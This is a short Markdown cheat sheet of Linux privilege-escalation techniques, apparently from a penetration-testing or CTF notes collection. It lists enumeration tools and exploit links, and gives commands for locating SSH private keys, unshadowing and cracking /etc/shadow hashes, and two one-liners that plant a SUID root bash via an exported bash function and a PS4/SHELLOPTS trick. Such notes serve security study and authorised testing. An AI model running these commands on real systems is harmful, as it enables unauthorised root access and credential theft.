# Linux Privilege Escalation

## Links
* [Basics](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [LinEnum](https://github.com/rebootuser/LinEnum)
* [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)
* [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
* [GTFObins](https://gtfobins.github.io/) 
* [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)

## Kernel Exploits

### Dirty COW
* [CVE-2016-5195](https://dirtycow.ninja/)
* [c0w.c](../kernel-exploits/dirtycow)

## Stored Keys & Passwords
* History
* Environment Variables 
* Config + Dot Files
* SSH keys
```sh
find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
```

## Permissions
* Weak permissions
* Umask
* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.
    * e.g. `john --wordlist=./wordlist --format=crypt hash`
* SUID
    * list
    ```sh
    find / -perm /6000 -ls 2>dev/null
    ```
    * [Shared object injection](../../../exploit/linux/shared_object_injection.md)
    * [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
* User specific files
```sh
find / -user root -name "*.txt"
```

## Sudo Binary
* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)
* [CVE-2019-14287](../../../exploit/linux/sudo/CVE_2019_14287.md)
* [CVE-2019-18634](../../../exploit/linux/sudo/CVE_2019_18634.md)
* [LD_PRELOAD](../../../exploit/linux/ld_preload.md)
* `sudo -l` 
    * Take a look at GTFObins
    * Keep an eye on the displayed host and env capabilities 
    
## PATH Hijacking
* Interpositioning binaries via PATH
    * Look for binaries used in other bins and scripts
    * Interposition name and add the directory in front of  `$PATH`

## Bash function
* Interpositioning of binaries via bash functions
```sh
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
```
```sh
export -f /path/to/binary
```
* Call binary which invokes this function

## Environment Variable
```sh
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'
```

## Capabilities
* [capabilities](../../../exploit/linux/capabilities.md)

## Crontab
* Check `cat /etc/crontab`
* Check writable scripts and binaries that are scheduled
* Check `$PATH` order

## NFS Rootsquash
* [nfs rootsquash](../../../exploit/linux/nfs_rootsquash.md)